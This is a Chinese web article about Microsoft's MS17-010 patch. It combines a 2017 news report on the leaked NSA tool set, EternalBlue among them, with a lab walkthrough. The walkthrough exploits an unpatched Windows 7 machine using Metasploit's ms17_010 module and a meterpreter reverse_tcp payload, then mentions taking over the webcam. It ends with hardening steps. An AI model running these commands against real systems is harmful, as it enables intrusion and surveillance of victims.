微软ms17-010补丁(微软系统补丁kb2670838)

前沿拓展：

微软ms17-010补丁

我的情况和你一样，重新做系统之后就没事了，其实这个补丁装不装都可以！没什么作用！

中新网4月20日电近日美国国家**(NSA)的黑客武器库遭曝光，其中有多个远程攻击Windows系统的武器已在网上公开，任何人都可以使用NSA的武器攻击其他电脑。对此，360安全卫士于4月19日晚间紧急推出“NSA武器库免疫工具”，可一键检测修复漏洞、关闭高风险服务，从而全面免疫预防NSA黑客武器。

NSA武器库免疫工具下载地址：dl.360safe.com/nsa/nsatool.exe

NSA武器库的公开被称为是网络世界“核弹危机”，其中有十款影响Windows个人用户的黑客工具，包括永恒之蓝、永恒王者、永恒浪漫、永恒协作、翡翠纤维、古怪地鼠、爱斯基摩卷、文雅学者、日食之翼和尊重审查。这些工具能够远程攻破全球约70%的Windows系统，无需用户任何**作，只要联网就可以入侵电脑，就像冲击波、震荡波等著名蠕虫一样可以瞬间血洗互联网，木马黑产很可能改造NSA的武器攻击普通网民。

据微软官方回应，NSA武器库攻击的Windows系统漏洞已在近期补丁中完成修复。但是对于Windows XP、2003等失去微软支持的系统版本来说，目前仍处于“裸奔”状态。此外，由于漏洞影响全系列Windows版本，没有及时安装补丁的Win7、Win8甚至Win10用户也处于危险之中。

针对不同版本Windows用户，360“NSA武器库免疫工具”可以扫描系统环境，精准检测出NSA武器库使用的漏洞是否已经修复，并提示用户安装相应的补丁。针对XP、2003等无补丁的系统版本用户，防御工具能够帮助用户关闭存在高危风险的服务，从而对NSA黑客武器攻击的系统漏洞彻底“免疫”。

1、EternalBlue(永恒之蓝)：**Bv1漏洞攻击工具，影响全平台，已被微软补丁MS17-010修复。在微软支持期的系统可使用360安全卫士检测修复漏洞，不在支持期的系统可使用360“NSA武器库免疫工具”进行免疫；

2、EternalChampion(永恒王者)：**Bv1漏洞攻击工具，影响全平台，已被微软补丁MS17-010修复。在微软支持期的系统可使用360安全卫士检测修复漏洞，不在支持期的系统可使用360“NSA武器库免疫工具”进行免疫；

3、EternalRomance(永恒浪漫)：**Bv1漏洞攻击工具，影响全平台，已被微软补丁MS17-010修复。在微软支持期的系统可使用360安全卫士检测修复漏洞，不在支持期的系统可使用360“NSA武器库免疫工具”进行免疫；

4、EternalSynergy(永恒协作)：**Bv3漏洞攻击工具，影响全平台，已被微软补丁MS17-010修复。在微软支持期的系统可使用360安全卫士检测修复漏洞，不在支持期的系统可使用360“NSA武器库免疫工具”进行免疫；

5、EmeraldThread(翡翠纤维)：**Bv1漏洞攻击工具，影响XP和2003，已被微软补丁MS10-061修复，相关系统用户可使用360安全卫士检测修复漏洞；

6、ErraticGopher(古怪地鼠)：**B漏洞攻击工具，影响XP和2003，无补丁，相关系统用户可使用360“NSA武器库免疫工具”进行免疫；

7、EskimoRoll(爱斯基摩卷)：Kerberos漏洞攻击工具，影响2000/2003/2008/2008 R2的域控服务器，已被微软补丁MS14-068修复，相关系统用户可使用360安全卫士检测修复漏洞；

8、EducatedScholar(文雅学者):**B漏洞攻击工具，影响VISTA和2008，已被微软补丁MS09-050修复，相关系统用户可使用360安全卫士检测修复漏洞；

9、EclipsedWing(日食之翼)：Server netAPI漏洞攻击工具，影响2008及之前的所有系统版本，已被微软补丁MS08-067修复，相关系统用户可使用360安全卫士检测修复漏洞；

10、EsteemAudit(尊重审查)：RDP漏洞远程攻击工具，影响XP和2003，无补丁，相关系统用户可使用360“NSA武器库免疫工具”进行免疫。

拓展知识：

微软ms17-010补丁

（第一次在发表文章，没啥经验，分享一些学习经验。大佬们多多包涵，也希望大家能够指出我的错误。）

靶机：windows7 x64 IP：192.168.1.5

攻击机：Kali Rolling (2019.3) x64 IP：192.168.1.3

两台主机在同一网段内；win7关闭防火墙并且开启445端口。

1、使用ipconfig/ifconfig分别查看win7和kali的ip。

2、打开msf工具

每次开启都会有不同的界面

3、使用search命令搜索ms17_010

4、选择模块和设置条件

使用use来选择第三个模块，可以直接 use 2，也可以打全

第二用set来设置靶机IP set rhost 192.168.1.5

设置本机IP set lhost 192.168.1.3

设置**端口 set lport 8888 不设置则默认4444端口

设置payload set payload windows/x64/meterpreter/reverse_tcp

还有另外一个payload能用于本实验，具体可以 show payloads 查看

最后，可以使用show options检查所有信息

5、开始渗透 run

稍等片刻看到win则成功创建会话

6、成功之后，可以开启Windows7的摄像头，截图等等

具体可以用help查看

1、关闭445端口

2、打开防火墙，安装安全软件

3、安装对应补丁，这里就不放链接了

关闭445端口的方法：

1）打开控制面板—-Windows防火墙—-高级设置

2）点击新建规则，设置端口号的规则并且命名（如图）

msf工具虽然强大，但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。

原创文章，作者：九贤生活小编，如若转载，请注明出处：http://www.wangguangwei.com/56222.html

微软ms17-010补丁(微软系统补丁kb2670838)

前沿拓展：

微软ms17-010补丁

拓展知识：

微软ms17-010补丁

相关推荐